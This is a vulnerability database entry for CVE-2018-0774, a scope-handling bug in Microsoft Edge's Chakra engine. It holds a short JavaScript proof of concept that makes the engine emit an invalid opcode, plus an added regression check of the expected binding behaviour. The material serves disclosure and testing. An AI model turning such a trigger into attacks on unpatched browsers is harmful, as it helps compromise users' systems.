Microsoft Edge: Chakra: Incorrect scope handling (CVE-2018-0774)

2018-01-22T00:00:00
ID SSV:97095
Type seebug
Reporter Root
Modified 2018-01-22T00:00:00

Description

PoC:

```
(function func(arg = function () {
    print(func);  // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
    print(func);
    function func() {

    }
})();
```

Chakra fails to distinguish whether the function is referenced in the param scope and ends up emitting an invalid opcode.
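The binding resolution a conforming engine is expected to produce for this shape of code, written as a regression-style check. This is an added example, not part of the original report or of Chakra's source; the names `checkParamScopeBinding`, `outer` and `seen` are chosen here for illustration.

```javascript
// Added example: checks how `func` resolves in the param scope versus the
// body scope of a named function expression with a default-parameter closure.
function checkParamScopeBinding() {
  const seen = {};
  const outer = function func(arg = function () {
    // Param scope: the body-level declaration is not visible here, so
    // `func` must resolve to the named function expression itself.
    seen.param = func;
    return 1;
  }()) {
    // Body scope: the hoisted inner declaration shadows the outer name.
    seen.body = func;
    function func() {}
    seen.inner = func;
    return arg;
  };
  seen.arg = outer();

  // Collect every deviation from the expected resolution.
  const failures = [];
  if (seen.param !== outer) {
    failures.push("param scope: func is not the named function expression");
  }
  if (seen.body !== seen.inner) {
    failures.push("body scope: func is not the hoisted inner declaration");
  }
  if (seen.body === outer) {
    failures.push("body scope: inner declaration does not shadow outer name");
  }
  if (seen.arg !== 1) {
    failures.push("default parameter closure did not run as expected");
  }
  return failures;
}

const failures = checkParamScopeBinding();
console.log(failures.length === 0 ? "scope resolution OK" : failures.join("\n"));
```

An empty result means the engine kept the two `func` bindings apart, which is the distinction the report says Chakra's bytecode generator lost.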